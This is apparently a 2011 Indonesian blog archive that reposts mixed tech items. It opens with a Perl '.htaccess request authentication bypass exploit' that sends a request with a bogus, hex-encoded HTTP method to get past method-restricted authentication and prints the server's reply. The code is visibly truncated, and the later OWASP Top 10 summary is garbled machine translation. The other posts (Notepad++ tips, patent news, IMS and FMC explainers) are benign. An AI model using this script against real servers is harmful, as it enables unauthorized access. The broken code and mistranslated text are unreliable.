Tuesday, April 26, 2011

.htaccess request authentication bypass exploit

.htaccess request authentication bypass exploit: "

bypass request auth di .htaccess :



?View Code LANGUAGE
use IO::Socket;
use strict;
use warnings;

# __________________________________________________
#
# ------------------------------------------------
# | htaccess request authentication bypass exploit |
# ------------------------------------------------
#
# written by katharsis - www.katharsis.x2.to
#
# __________________________________________________

< $host,
PeerPort => '80',
Proto => 'tcp',
);

my $packet =

"\x4D\x58\x48\x5A\x4D\x58\x20".$file.
"\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\n".
"\x48\x6F\x73\x74\x3A\x20".$host."\n\n\n";

print $socket $packet;

while(<$socket>)
{
print;
}

close($socket);


thanks to ./kamtiez

"

Sunday, April 24, 2011

Google Fined $5 Million in Linux Patent Case

Google Fined $5 Million in Linux Patent Case: "
If Google is one of the most prominent Linux stalwarts around, Android is undoubtedly the public face of its love affair with the open source operating system. But its Linux affection runs deeper than that as the Internet behemoth uses the OS on everything from back-end servers to employee machines. Now, that deep-rooted love is beginning to cost Google, for a jury has fined it $5 million for infringing on a patent (U.S. Patent No. 5,893,120) held by Texas-bases patent troll Bedrock Computer Technologies.

Google was not the only company sued by Bedrock for the

Friday, April 22, 2011

Notepad++ Cheat Sheet: 11 Tricks And Tips For Plaintext Power Users

Notepad++ Cheat Sheet: 11 Tricks And Tips For Plaintext Power Users: "

It's hard to think of a program that's as quintessentially Windows as good ol' Notepad.exe. It's been there for us since the very beginning, and it hasn't changed a bit. And that's the problem.


If you do much work with plaintext, you know that there are better options than Notepad, chief among them Notepad++. If you've never tried Notepad++, you should give it a shot. It's available for free here and adds a whole bunch of modern features to the plaintext editor formula, including tabbed documents, syntax highlighting and plugin support.


If you have used Notepad++, you probably haven't used it to its full potential, read on for 11 quick tips and tricks to get more out of Notepad++.



Go Portable


A portable Notepad++, you say? Indeed! You can bring the joys of this feature-laden program with you on a USB key or portable hard drive, provided you’ve gone and grabbed the Notepad++ Portable Edition—an offshoot of the primary application. It works just as well as the chained-to-your-desktop Notepad++ you’re used to using, so have at it!


Predictive Text


TypingAid is a cool little application that builds the benefits of predictive text right overtop your standard Notepad++ interface. Not only can the app learn words as you type—which it then uses to help you auto-complete commonly used words and phrases—but it can also boost up its own vocabulary with word lists you download from the Internet. And did we mention it’s a portable application, too?


Code Faster, Harder, Stronger


Zen Coding is an add-on that allows you to construct HTML documents in a brand-new fashion. By that, we mean that you’ll no longer have to repetitively type various tags both opened and closed, and then dump your content in the middle. The plugin—or, rather, set of plugins—lets you instead enter your desired HTML all on a single line. It then parses this out to create a huge indented output of correct HTML, thus saving you time from having to write all that yourself.


Save, Save, Save


The add-on Autosave for Notepad++ does just what its name implies—it builds an autosave feature right into the application (one that’s sorely missing, mind you) such that you’ll never lose your work again due to the personal error of forgetting to save one’s information pre-system-crsah. You can set the plugin to auto-save on a timed interval or, more useful, whenever you jump out of the app to focus on a new window temporarily.


Get On Top


The add-on TopMost is a very simple extension to slap into Notepad++, and the single feature it offers—while not life-changing—is nevertheless helpful, especially for those of the coding variety. With said add-on, you can automatically stick Notepad++ on top of any other window on your desktop, even if you’ve pulled your actual focus to a different window entirely.


Notepad++ Tetris



While it’s not the best add-on productivity-wise, the extension Fallingbricks for Notepad++ gives you a bare, but working, version of Tetris to play within the app itself. It even automatically pauses for you if you close the game’s dialog box, a kind-of built-in boss key--though we've gotta say it's pretty sad if you’ve resorted to playing Tetris within a Windows Notepad replacement just to pass the time.


Synchronize with an FTP


Nppftp is an add-on that is one part useful, two parts awesome: It allows you to quickly synchronize what you’re working on with an FTP server that you’ve set up within the add-on’s configuration screen. For any who use Notepad++ to get actual coding done, this is an excellent way to both upload and download files from a server with great haste—you’ll never need an external FTP client ever again! Well, maybe hardly ever.


Automate Your Editing Life


Just like its bulky counterpart, Microsoft Office, Notepad++ comes out of the gate with full support for Macros—an automated task that you can repeat over, and over, and over by selecting said macro instead of repeating whatever actions you’ve previously recorded under the Macro menu of Notepad++. Once you’ve built your masterwork, you can also assign it to a keyboard button for even quicker access.


Edit… Vertically!


Not only can you select text and make all sorts of changes in a horizontal fashion within Notepad++ (or any application, for that matter), but if you hold down the Alt key while selecting a chunk of text, you’ll do so vertically. Any changes you make will now be replicated across the rows of text you’ve selected, meaning that you can do things like change one character in a tightly structured document with just a single edit, for example.


Save Your State


One of the coolest features of Notepad++ is its ability to dump a tabbed “browsing session” of-sorts within the application—making it super-easy to jump through and edit multiple files at any given time. Well, if you have a series of documents that you often play around with, you don’t have to constantly load them into Notepad++ time and time again. Just go to the app’s File menu and select the Save Session option. Reloading said session will pull up the litany of tabs you’re used to working on.


Editing Side-By-Side


Staying on the tabbed bandwagon for a moment, you can also quickly move the contents of a particular tab into a side-by-side editing window, which is extremely helpful if you need to quickly look at the contents of two files at once. Just right-click on any given tab within Notepad++ and select the “Move to…” or “Clone to Other View” options for the ultimate in side-by-side text editing!

"

10 alasan website g0t hacked

10 alasan website g0t hacked: "

Di bawah ini Anda akan menemukan daftar top 10 kerentanan web diklasifikasikan oleh OWASP, di sini juga deskripsi dari masalah dan beberapa contoh.


Saya hanya akan memberi Anda daftar jika anda tidak terjawab itu sebelumnya, saya tidak akan mengomentari ini sebagai salah satu sudah ada diskusi panas mengenai hal ini di beberapa situs / forum.


Jadi penyebab / alasan tersebut adalah :


1. Cross site script­ing (XSS)


kerentanan keamanan aplikasi Web, kelemahan XSS terjadi ketika aplikasi mengirim data pengguna ke web browser tanpa terlebih dahulu validasi atau pengkodean konten. Hal ini memungkinkan hacker jahat mengeksekusi skrip di browser, membiarkan mereka membajak sesi pengguna, situs Web merusak, konten masukkan bermusuhan dan melakukan phishing dan serangan malware.


Serangan biasanya dilakukan dengan JavaScript, membiarkan hacker memanipulasi segala aspek dari halaman. Dalam skenario terburuk, hacker bisa mencuri informasi dan berkedok sebagai pengguna di situs Web sebuah bank, menurut Snyder.


Dunia nyata contoh: PayPal menjadi sasaran tahun lalu ketika penyerang PayPal pengunjung diarahkan ke halaman peringatan pengguna account mereka telah terbongkar. Korban diarahkan ke situs phishing dan diminta untuk memasukkan informasi login PayPal, nomor Jaminan Sosial dan rincian kartu kredit. PayPal mengatakan menutup kerentanan pada bulan Juni 2006.


Bagaimana melindungi pengguna: Gunakan daftar putih untuk memvalidasi semua data yang masuk, yang menolak setiap data yang tidak ditentukan pada daftar putih sebagai yang baik. Pendekatan ini adalah kebalikan dari daftar hitam, yang menolak masukan hanya diketahui buruk. Selain itu, menggunakan pengkodean yang tepat semua data keluaran. “Validasi memungkinkan deteksi serangan, dan pengkodean mencegah setiap injeksi skrip sukses dari berjalan di browser,” kata OWASP.


2. Injec­tion flaws


Masalah: Bila data yang disediakan pengguna akan dikirim ke penerjemah sebagai bagian dari perintah atau query, trik hacker penafsir – yang menafsirkan perintah berbasis teks – dalam menjalankan perintah yang tidak diinginkan. “Kekurangan Injeksi memungkinkan penyerang untuk menciptakan, membaca, memperbarui, atau menghapus data yang sewenang-wenang yang tersedia untuk aplikasi,” tulis OWASP. “Dalam skenario terburuk, kekurangan ini memungkinkan seorang penyerang untuk sepenuhnya kompromi aplikasi dan sistem yang mendasari, bahkan melewati firewall lingkungan sangat bersarang.”


Dunia nyata contoh: hacker Rusia pecah menjadi pemerintah Rhode Island situs Web untuk mencuri data kartu kredit pada bulan Januari 2006. Hacker mengklaim serangan injeksi SQL mencuri 53.000 nomor kartu kredit, sedangkan penyedia layanan hosting klaim itu hanya 4.113.


Bagaimana melindungi pengguna: interpreter menggunakan Hindari jika memungkinkan. “Jika Anda harus memanggil seorang juru bahasa, metode kunci untuk menghindari suntikan adalah penggunaan API yang aman, seperti parameter query strongly typed dan pemetaan relasional obyek perpustakaan,” tulis OWASP….


3. Mali­cious file exe­cu­tion


Masalah: Hacker dapat melakukan eksekusi kode jauh, instalasi jarak jauh rootkit, atau benar-benar kompromi sistem. Setiap jenis aplikasi Web adalah rentan jika menerima nama file atau file dari pengguna. kerentanan mungkin yang paling umum dengan PHP, bahasa scripting banyak digunakan untuk pengembangan Web.


Dunia nyata contoh: Seorang programmer remaja ditemukan pada tahun 2002 yang Tebak com adalah rentan terhadap serangan yang bisa mencuri lebih dari 200.000 data pelanggan dari database Guess, termasuk nama, nomor kartu kredit dan tanggal kadaluwarsa.. Tebak setuju untuk meningkatkan keamanan informasi pada tahun depan setelah diselidiki oleh Federal Trade Commission.


Bagaimana melindungi pengguna: Jangan menggunakan input yang diberikan oleh pengguna dalam setiap nama berkas sumber daya berbasis server, seperti gambar dan inklusi script. Set aturan firewall untuk mencegah koneksi baru ke situs Web eksternal dan sistem internal.



4. Inse­cure direct object ref­er­ence


Masalah: Penyerang memanipulasi referensi objek langsung untuk mendapatkan akses tidak sah ke objek lain. Hal ini terjadi ketika URL atau bentuk parameter berisi referensi ke objek seperti file, direktori, catatan database atau kunci.


Perbankan situs Web biasa menggunakan nomor account pelanggan sebagai kunci utama, dan mungkin mengekspos nomor rekening di antarmuka web.


“Referensi untuk kunci database sering terkena,” tulis OWASP. “Seorang penyerang dapat menyerang parameter ini hanya dengan menebak atau mencari kunci lain yang valid. Seringkali, ini adalah sequen-TiAl di alam. ”


Dunia nyata contoh: Sebuah situs Australian Taxation Office hacked pada tahun 2000 oleh seorang pengguna yang berubah hadiah ID pajak di URL untuk mengakses rincian 17.000 perusahaan. hacker e-mail yang 17.000 usaha untuk memberitahu mereka tentang pelanggaran keamanan.


Bagaimana melindungi pengguna: Gunakan indeks, peta referensi tidak langsung atau tidak langsung metode lain untuk menghindari paparan referensi objek langsung. Jika Anda tidak dapat menghindari referensi langsung, wewenang pengunjung situs Web sebelum menggunakannya.


5. Cross site request forgery


Masalah: “Sederhana dan menghancurkan,” serangan ini mengambil kontrol browser korban ketika login ke sebuah situs Web, dan mengirimkan permintaan berbahaya untuk aplikasi Web. situs Web ini sangat rentan, sebagian karena mereka cenderung untuk mengotorisasi permintaan berdasarkan session cookies atau “ingat saya” fungsionalitas. Bank tar potensial-TiAl-akan.


“Sembilan puluh sembilan persen dari aplikasi di Internet rentan untuk menyeberang pemalsuan situs permintaan,” kata Williams. “Apakah ada aktual mengeksploitasi mana seseorang kehilangan uang? Prob-a-Bly bank bahkan tidak tahu. Untuk bank, semua itu tampak seperti adalah transaksi yang sah dari log-in pengguna. ”


Dunia nyata contoh: Seorang hacker dikenal sebagai Samy mendapatkan lebih dari satu juta “teman” di MySpace com dengan cacing pada akhir tahun 2005, secara otomatis termasuk pesan “Samy adalah pahlawan saya” dalam ribuan halaman MySpace.. Serangan itu sendiri tidak mungkin telah yang berbahaya, tapi dikatakan untuk menunjukkan kekuatan menggabungkan scripting lintas situs dengan pemalsuan permintaan lintas situs. Contoh lain yang terungkap satu tahun yang lalu terkena kerentanan Google memungkinkan situs luar untuk mengubah preferensi bahasa pengguna Google.


Bagaimana melindungi pengguna: Jangan mengandalkan kredensial atau token secara otomatis disampaikan oleh browser. “Satu-satunya solusi adalah dengan menggunakan tanda khusus bahwa browser tidak akan ‘ingat,’” OWASP menulis.


6. Infor­ma­tion leak­age and improper error han­dling


Masalah: Pesan kesalahan bahwa aplikasi menghasilkan dan menampilkan kepada pengguna adalah berguna untuk hacker ketika mereka melanggar privasi atau tidak sengaja membocorkan informasi tentang konfigurasi program dan kerja internal.


“Aplikasi Web akan sering membocorkan informasi tentang keadaan internal mereka melalui pesan kesalahan rinci atau debug. Sering kali, informasi ini dapat dimanfaatkan untuk memulai atau bahkan mengotomatisasi serangan lebih kuat, “kata OWASP.


Dunia nyata contoh: Informasi kebocoran melampaui error handling, berlaku juga untuk pelanggaran terjadi ketika data rahasia yang tersisa di depan mata. The bencana ChoicePoint pada awal tahun 2005 sehingga jatuh di suatu tempat di kategori ini. Catatan dari 163.000 konsumen terganggu setelah penjahat berpura-pura menjadi pelanggan sah ChoicePoint dicari rincian tentang individu yang terdaftar dalam database perusahaan informasi pribadi. ChoicePoint kemudian terbatas penjualan produk informasi berisi data sensitif.


Bagaimana melindungi pengguna: Gunakan alat pengujian seperti OWASP’S WebScarab Proyek untuk melihat apa kesalahan aplikasi Anda menghasilkan. “Aplikasi yang belum diuji dengan cara ini akan hampir pasti menghasilkan keluaran error yang tidak terduga,” tulis OWASP.


7. Bro­ken authen­ti­ca­tion and ses­sion man­age­ment


Masalah: Pengguna dan rekening administratif bisa dibajak ketika aplikasi gagal untuk melindungi kepercayaan dan token sesi dari awal hingga akhir. Watch out for pelanggaran privasi dan merusak kontrol otorisasi dan akuntabilitas.


“Kesalahan dalam mekanisme otentikasi utama yang tidak biasa, tetapi kelemahan lebih sering diperkenalkan melalui fungsi otentikasi tambahan seperti logout, manajemen password, timeout, ingat saya, pertanyaan rahasia dan memperbarui account,” tulis OWASP.


Dunia nyata contoh: Microsoft harus menghilangkan kerentanan di Hotmail yang bisa membiarkan programmer JavaScript berbahaya mencuri password pengguna pada tahun 2002. Diungkapkan oleh seorang reseller produk-produk jaringan, cacat itu rentan terhadap e-mail yang berisi Trojan mengubah antarmuka pengguna Hotmail, memaksa pengguna untuk berulang kali masuk kembali password mereka dan tanpa disadari mengirimkannya ke hacker.


Bagaimana melindungi pengguna: Komunikasi dan penyimpanan mandat harus aman. Protokol SSL untuk mentransmisikan dokumen pribadi harus menjadi satu-satunya pilihan untuk bagian otentik dari aplikasi, dan mandat harus disimpan dalam bentuk hash atau dienkripsi.


Tip lain: menyingkirkan cookies kustom yang digunakan untuk manajemen otentikasi atau sesi.





8. Inse­cure cryp­to­graphic stor­age


Masalah: Banyak web developer gagal untuk mengenkripsi data sensitif dalam penyimpanan, walaupun kriptografi adalah bagian penting dari aplikasi web yang paling. Bahkan ketika enkripsi hadir, itu sering kurang didesain, menggunakan cipher tidak pantas.


“Kekurangan ini dapat menyebabkan pengungkapan data sensitif dan pelanggaran kepatuhan,” tulis OWASP.


Dunia nyata contoh: Data TJX pelanggaran yang terkena 45,7 juta nomor kartu kredit dan debit. Penyelidikan pemerintah Kanada disalahkan TJX karena gagal untuk meng-upgrade sistem enkripsi data sebelum itu ditargetkan oleh menguping elektronik mulai pada bulan Juli 2005.

Bagaimana melindungi pengguna: Jangan menciptakan algoritma kriptografi Anda sendiri. “Hanya menggunakan algoritma publik disetujui seperti AES, RSA kriptografi kunci publik, dan SHA-256 atau lebih baik untuk hashing,” saran OWASP.


Selanjutnya, menghasilkan offline kunci, dan tidak pernah mengirimkan kunci privat melalui saluran tidak aman.


9. Inse­cure com­mu­ni­ca­tions


Masalah: Serupa dengan No 8, ini adalah kegagalan untuk mengenkripsi lalu lintas jaringan saat itu diperlukan untuk melindungi komunikasi sensitif. Penyerang dapat mengakses percakapan tidak terlindungi, termasuk transmisi dari kepercayaan dan informasi sensitif. Untuk alasan ini, standar PCI memerlukan enkripsi informasi kartu kredit dikirimkan melalui Internet.


Dunia nyata ujian-ple: TJX lagi. Peneliti berpendapat hacker menggunakan antena berbentuk teleskop dan komputer laptop untuk mencuri pertukaran data secara nirkabel antara perangkat harga-pemeriksaan portabel, dan komputer cash register toko, Wall Street Journal melaporkan.


“Jaringan nirkabel pengecer $ 17,4 miliar sudah keamanan kurang dari banyak orang di jaringan rumah mereka,” tulis Journal. TJX menggunakan sistem penyandian WEP, WPA daripada lebih kuat.


Bagaimana melindungi pengguna: Gunakan SSL pada setiap koneksi disahkan atau selama transmisi data sensitif, seperti kredensial pengguna, rincian kartu kredit, catatan kesehatan dan informasi pribadi lainnya. SSL atau protokol enkripsi yang sama juga harus diterapkan kepada klien, mitra, staf dan akses administratif ke sistem online. Menggunakan transportasi lapisan keamanan atau enkripsi protokol tingkat untuk melindungi komunikasi antara bagian dari infrastruktur, seperti server web dan sistem database.


10. Fail­ure to restrict URL access


Masalah: Beberapa halaman web seharusnya terbatas pada sebagian kecil dari pengguna khusus, seperti administrator. Namun sering kali tidak ada perlindungan real dari halaman-halaman, dan hacker dapat menemukan URL dengan membuat dugaan. Katakanlah URL merujuk ke nomor ID seperti “123456.” Seorang hacker mungkin mengatakan mengatakan ‘Aku ingin tahu apa yang ada di 123.457?’ Williams.


Serangan menargetkan kerentanan ini disebut dipaksa browsing, “yang meliputi link menebak dan teknik kekerasan untuk menemukan halaman yang tidak dilindungi,” kata OWASP.


Dunia nyata contoh: Sebuah lubang di Macworld Conference & Expo situs web tahun ini memungkinkan pengguna mendapatkan “Platinum” melewati senilai hampir $ 1.700 dan khusus akses ke sebuah pidato keynote Steve Jobs, semuanya gratis. Cacat yang adalah kode yang hak dievaluasi pada klien tetapi tidak di server, orang-orang membiarkan ambil tiket gratis melalui JavaScript di browser, bukan server.


Bagaimana melindungi pengguna: Jangan mengasumsikan pengguna akan menyadari URL tersembunyi. Semua fungsi URL dan bisnis harus dilindungi oleh suatu mekanisme kontrol akses yang efektif yang memverifikasi peran pengguna dan hak istimewa. “Pastikan ini dilakukan … setiap langkah, tidak hanya sekali terhadap awal dari setiap proses multi-langkah,” saran OWASP.


*


by the why OWASP tu apa..??penasaran kan dari tadi kata di atas ada bnyak kata tentang OWASP…


OWASP adalah Open Web Application Security Project (OWASP) adalah sebuah aplikasi open-source proyek keamanan. Komunitas OWASP meliputi perusahaan, organisasi pendidikan, dan individu dari seluruh dunia. Komunitas ini berfungsi untuk membuat artikel bebas yang tersedia, metodologi, dokumentasi, peralatan, dan teknologi. Yayasan OWASP adalah 501 (c) (3) organisasi amal yang mendukung dan mengelola proyek-proyek OWASP dan infrastruktur.


OWASP tidak berafiliasi dengan perusahaan teknologi, meskipun mendukung penggunaan informasi teknologi keamanan. OWASP memiliki afiliasi dihindari karena percaya kebebasan dari tekanan organisasi mungkin akan mudah untuk itu untuk memberikan bias, praktis, informasi biaya-efektif tentang keamanan aplikasi. [Rujukan?] OWASP pendukung pendekatan keamanan aplikasi dengan memperhatikan orang, proses, dan teknologi dimensi .


dokumen OWASP paling sukses termasuk buku-panjang OWASP Guide dan OWASP luas diadopsi Top 10 dokumen kesadaran [Sunting] OWASP yang paling banyak digunakan alat-alat meliputi pelatihan lingkungan mereka WebGoat, penetrasi pengujian mereka proxy WebScarab, dan mereka OWASP alat BERSIH… OWASP mencakup sekitar 100 mitra lokal di seluruh dunia dan ribuan peserta pada daftar proyek list. OWASP telah menyelenggarakan serangkaian AppSec konferensi untuk lebih membangun komunitas keamanan aplikasi.


OWASP juga merupakan badan standar muncul, dengan penerbitan standar pertama pada Desember 2008, OWASP Keamanan Aplikasi Standar Verifikasi (ASVS). Tujuan utama dari OWASP ASVS proyek ini adalah untuk menormalkan rentang cakupan dan tingkat ketelitian yang tersedia di pasar ketika datang untuk verifikasi keamanan aplikasi-tingkat kinerja. Tujuannya adalah untuk menciptakan satu set standar terbuka komersial-dapat dilaksanakan yang disesuaikan dengan teknologi berbasis web yang spesifik. Sebuah Aplikasi Web Edition telah diterbitkan. Sebuah Web Service Edisi sedang dalam pengembangan.

"

Monitoring Aplikasi Yang memakai Sumber Daya system Pada Windows 7

Monitoring Aplikasi Yang memakai Sumber Daya system Pada Windows 7: "
Kita semua tahu bahwa semakin lama Anda menggunakan komputer Anda, semakin lambat itu akan menjadi. Ada banyak waktu ketika kita mengalami hal ini sindrom PC lambat dan kita benar-benar tidak tahu yang aplikasi yang mengambil semua sumber daya. Bagaimana jika ada cara untuk melacak dan memonitor aplikasi Anda dan periksa mana yang menyebabkan masalah dalam sistem anda?

Tuesday, April 12, 2011

IP Multimedia Subsistem

IP Multimedia Subsistem: "

A. Pengertian IMS

IMS (IP Multimedia Subsystem) merupakan susunan jaringan berbasis paket yang bersifat fleksibel yang setiap operator jaringan bisa atau mungkin untuk menghadirkan multimedia dan layanan-layanan yang menguntungkan bagi operator. Teknologi IMS ini menggabungkan teknologi wireless dan wireline dengan layanan suara dan data. IMS muncul diawali dengan kehadiran teknologi softswitch , IMS ini adalah awal dari konsep NGN (Next Generation Network). Dengan IMS Internet dapat diakses oleh setiap orang di berbagai lokasi.

Prinsip IMS adalah mengatur session untuk setiap layanan. IMS juga membantu Operator untuk memperkenalkan layanan-layanan yang baru seperti Webbrowsing, WAP dan MMS. Selain itu dengan IMS kita juga dapat membaca E-mail, menonton film, atau ikut video conference dimanapun kita berada dengan menggunakan perangkat 3G.

Jaringan 3G ini bertujuan menggabungkan dua aspek yang sangat penting dalam komunikasi yaitu internet dan komunikasi seluler. Elemen kunci dalam arsitektur 3G adalah IMS, yang berfungsi untuk menyediakan akses seluler dimanapun ke seluruh layanan internet. Standar IMS mendukung banyak teknologi akses jaringan termasuk GSM, WCDMA, CDMA 2000, dan WLAN.

Protokol sinyal utama yang digunakan pada IMS adalah Session initiation Protokol (SIP) yang merupakan standar yang diajukan untuk komunikasi multimedia antara pengguna yang berinteraksi dengan suara, video, dan IM.

B. Konsep IMS

Konsep IMS adalah memberikan layanan internet di berbagai tempat dengan meggunakan teknologi seluler. Dari sisi pengguna, IMS memberikan layanan komunikasi person-to-person dan person-to-content dengan berbagai model komunikasi, meliputi suara, teks, gambar dan video, atau kombinasinya, dengan cara yang sangat personal dan terkontrol.

Dari sisi operator, IMS memberikan kemajuan yang sangat penting pada konsep arsitektur layering dengan mendefinisikan sebuah arsitektur horizontal, dimana service enablers dan common functions dapat di gunakan ulang untuk berbagai aplikasi. Pada konsep NGN dengan softswitch (wireline), seluruh session layanan yang timbul akan dilewatkan pada call manager (softswitch) baik data maupun suara.


Gambar 2. Call Control (Voice) dalam konsep NGN (Softswitch) (sumber: TEKELEC)

Softswitch pada awal lahirnya lebih banyak diarahkan pada layanan suara, oleh karena itu maka session yang ditimbulkan untuk layanan data menjadi tidak efektif dilewatkan pada satu server tunggal (softswitch). Hal ini dikarenakan, database pelanggan yang terlibat dalam layanan data tidak seluruhnya menggunakan layanan suara, demikian sebaliknya. Dengan konsep IMS ini maka ketidakesfisienan dapat diatasi dengan menggunakan IP Sub System (server) yang akan mengatasi layanan berdasarkan fitur - fiturnya, dimana setiap layanan akan dimengerti oleh session yang dibangun. Dengan IMS ini juga, kita dapat menggunakannya untuk membangun multi layanan dengan satu session, yang dapat menjadikan proses komunikasi yang dibangun lebih efisien. Dalam hal ini protocol SIP (session initiation protocol) akan sangat berperan.

IP Multimedia Subsystem (IMS) pada dasarnya dibuat khusus untuk jaringan mobile agar dapat memberikan layanan telekomunikasi berbasis IP.


Gambar Multimedia Session dalam Konsep IMS (sumber: TEKELEC)

Teknologi IMS juga diperkenalkan oleh lembaga Third Generation Partnership Project (3GPP) yang bergerak dalam bidang jaringan mobile, khususnya dalam pengembangan konsep jaringan Universal Mobile Telecommunications System (UMTS). Lembaga 3GPP2 telah mendefinisikan suatu referensi arsitektur, functional splits, spesifikasi protocol dan lainnya. Selain mendukung fitur utama, dapat dimungkinan pula pengembangan aplikasi oleh pihak ketiga melalui Session Initiation Protocol (SIP), integrated access dan charging.

Konsep IMS diperkenalkan di dunia telekomunikasi untuk memenuhi kebutuhan jaringan dan pengguna dengan spesfikasi sebagai berikut:

· proses pengiriman layanan komunikasi multimedia dengan karakteristik real time dan person to person dengan basis IP (seperti voice or videotelephony), demikian juga halnya dengan komunikasi person-to-machine (seperti layanan gaming).

· Mengembangkan layanan komunikasi multimedia real-time dengan non-real-time (seperti video live streaming dan chatting).

· Mampu melayani dan berinteraksi dengan layanan dan aplikasi yang beragam (seperti mengkombinasikan presence dan instant messaging).

· Kemudahan dalam melakukan setup multi layanan dalam satu session tunggal atau multi session secara bersamaan.

Arsitektur IMS

Arsitektur layanan IMS adalah susunan yang membantu jangkauan yang luas dan pada jaringan ini dimungkinkan fleksibilitas Protokol SIP. Arsitektur IMS bisa mendukung multiple application servers yang menyediakan layanan telepon tradisional (POTS/PSTN / PUBLIC SWITCH TELEPHONE NETWORK) dan layanan seperti halnya instant messaging, push to talk, multimedia messaging, video streaming, dan lainnya.

Arsitektur IMS mempunyai tiga lapisan,yaitu :

• Lapisan Transport dan Endpoint

Kedua lapisan ini berfungsi untuk mengatur (menyambung dan memutuskan) pensinyalan SIP (service internet protocol) untuk membentuk session dan menyediakan layanan bearer seperti mengubah suara dari format analog atau digital menjadi paket IP yang menggunakan Realtime Transport Protocol (RTP).

• Lapisan Session Control

Didalam lapisan session control ini terdapat Call Session Control Function (CSCF) yang berfungsi menyediakan registrasi dan melakukan proses routing dari pesan pensinyalan SIP ke application server yang dituju. Interworking antara Call Session Control Function (CSCF) dengan lapisan transport dilakukan dengan tujuan untuk menjamin semua layanan yang melaluinya. Dalam lapisan ini termasuk juga informasi registrasi end user yang sedang melakukan komunikasi (contohnya IP address), informasi roaming, layanan telepon (contohnya informasi call forwarding), informasi layanan pesan instant, dan pilihan voice mail. Di dalam Lapisan session control termasuk Media Gateway Control Function (MGCF), yang juga bekerjasama antara SIP signalling dengan media gateway (seperti H.248). MGCF berfungsi untuk mengatur distribusi dari session melalui multiple media gateways. Sedangkan Media Server Function Control (MSFC) berfungsi untuk menyediakan fungsi yang sama untuk media server.

• Layer Application Server

Lapisan ini ada application server yang menyediakan layanan end user logic. Arsitektur IMS dan pensinyalan SIP ini punya kemampuan yang fleksibel untuk mendukung berbagai macam variasi dari application servers untuk mengkomunikasikan layanan telepon dan non telepon .

Selain itu IMS juga mempunyai fitur – fitur yang dapat mendukung kinerja IMS antara lain

1. Platform umum dengan komponen yang dapat dipake ulang.

2. Biaya pemakaian dan penataan yang lebih kecil dibandingkan menggunakan teknologi lain.

3. kombinasi dari fungsionalitas dari setiap solusi.

4. Konsisten, interface terbuka untuk pengembang pihak ketiga.

5. Konsistensi bagi pihak end user dengan dimungkinkannya roaming tidak terbatas hanya ke layanan home network.

Referensi :

The IMS: IP Multimedia Concepts and Services in the Mobile Domain, Miikka Poikselka, John Wiley & sons, Ltd (ISBN: 0-470-87113-X)

Abdi Zaenal (2006), Industri telekomuniksi : Lokomotif pertumbuhan ekonomi dan kemajuan bangsa

IP Multimedia Sub System (IMS), Overview and Applications', 3G Americas, July 2004.

Mobile broadband

"

FMC (Fixed Mobile Convergence)

FMC (Fixed Mobile Convergence): "Teknologi IMS membawa dampak pula terhadap jenis layanan yang akan berkembang. Layanan yang akan berkembang adalah layanan yang berupa konvergensi layanan yang merupakan gabungan dari wireless dan wireline. Dengan adanya permintaan pasar yang seperti itu maka dibuat lah suatu teknologi yang bernama Fixed Mobile Convergence (FMC).

Fixed Mobile Convergence (FMC) merupakan suatu konsep yang berdasar pada penggunaan protocol yang sama untuk jaringan fixed, seluler maupun internet.

Konfergensi adalah bersatunya layanan telekomunikasi, teknologi informasi dan penyiaran dimana penyelenggaraan jasa telekomunikasi merupakan kegiatan penyediaan atau pelayanan jasa telekomunikasi melalui media apa saja termasuk TV, siaran, radio, dan multimedia. (sumber : media law ombudsperson).

Fixed Mobile Confergence (FMC) telah menjadi isu sangat menarik di lingkungan industry Telekomunikasi, terutama karena mendorong penghematan baik dalam biaya capital (capital expenditure) maupun biaya operasional operator.

Dengan adanya konvergensi ini diharaplan layanan multimedia berjalan pada perangkat (terminal), tanpa melihat mode akses dan arsitektur jaringannya masing-masing.

Dengan kata lain operator yang memiliki fixed network, mobile network maupun internet network dapat mengintegrasikan teknologinya menjadi satu pada pada layer core networknya (packet switching backbone broadband yang berbasis IP) yang dikenal dengan istilah Next Generation Network (NGN). Hal ini berdampak posistif pada perkembangan layanannya yang ditawarkan dan billing system-nyapun dapat dibuat terintegrasi, yang pada akhirnya memberi nilai tambah (value added) yang signifikan pada penggunanya.

Dampak Konfergensi

Yang merupakan dampak dari adanya konfergensi adalah :

1. Berubahnya gaya hidup masyarakat

2. Bisnis

3. Regulasi

Dengan adanya dampak tersebut dibutuhkan solusi-solusi yang dapat memperbaiki akibat dari dampak-dampak negative tersebut.



Gambar Fixed-Mobile Convergence (Sumber: ZTE)

SOLUSI FMC (Fixed Mobile Convergence)

Evolusi dari sistem berbasis circuit switched menjadi paket switched telah menghancurkan jurang pembatas antara layanan suara dan data. Hal ini member dampak yang besar pada bisnis tradisional yang memberikan pemisahan antara suara, data, jaringan mobile dan broadcast.

Format yang saat ini dipakai adalah suara, data, teks, dan gambar tetapi yang akan datang menggunakan format multimedia yang merupakan penyatuan dari seluruh layanan tersebut.

Perubahan tersebut dipengaruhi oleh kebutuhan pengguna jasa telekomunikasi. Kebutuhan tersebut antara lain:

1. Multi layanan suara, teks, gambar, video, data atau internet

2. Perpindahan teknologi yang halus

3. Banyak layanan yang dapat diakses oleh satu nomor.

4. mobilitas

5.Harga yang tetap.

Bagi operator kompetisi menjadi semakin ketat karena bergerak dari kompetisi terbatas menjadi kompetisi penuh karena mempunyai banyak keuntungan antara lain pelanggan yang semakin banyak dikarenakan semua jenis layanan dapat diakses dalam satu operator, penyebaran pasar yang semakin meningkat serta adanya penjualan silang layanan sehingga operator dapat menjual layanan mobile kepada user yang dilayani oleh operator jaringan fixed. Saat ini ada beberapa penyedia jaringan fixed mobile convergence, yaitu nokia Siemens network, dan Avaya nokia network.

Masing-masing dari penyedia fixed mobile convergence mempunyai solusi yang berbeda-beda yaitu :

Nokia – Siemens network

Persaingan yang terjadi antara operator bukan hanya dengan operator penyedia layanan (fixed, mobile, cable, dan hybrid) tetapi juga dengan internet servis Provider dan content provider sehingga para operator harus membangun strategi Fixed Mobile Convergence (FMC) yang cermat supaya dapat bersaing.

Nokia Siemens network mempunyai solusi yaitu dengan menyediakan integrasi layanan dengan biaya yang efisien dan kemampuan interopabilitas agar bisa bekerja di berbagai domains dan layanan. Nokia Siemens network juga menggabungkan layanan suara, pesan, dan multimedia untuk banyak device.

Melalui kerjasama dengan banyak operator dan provider Nokia Siemens menawarkan Mobile dan fixed off Switching, Solusi Perkabelan dan aplikasi IMS.

Ada beberapa hal penting yang harus dilakuka oleh operator supaya dapat bertahan dalam kompetisi untuk mendapatkan simpati dan loyalitas dari konsumen antara lain :

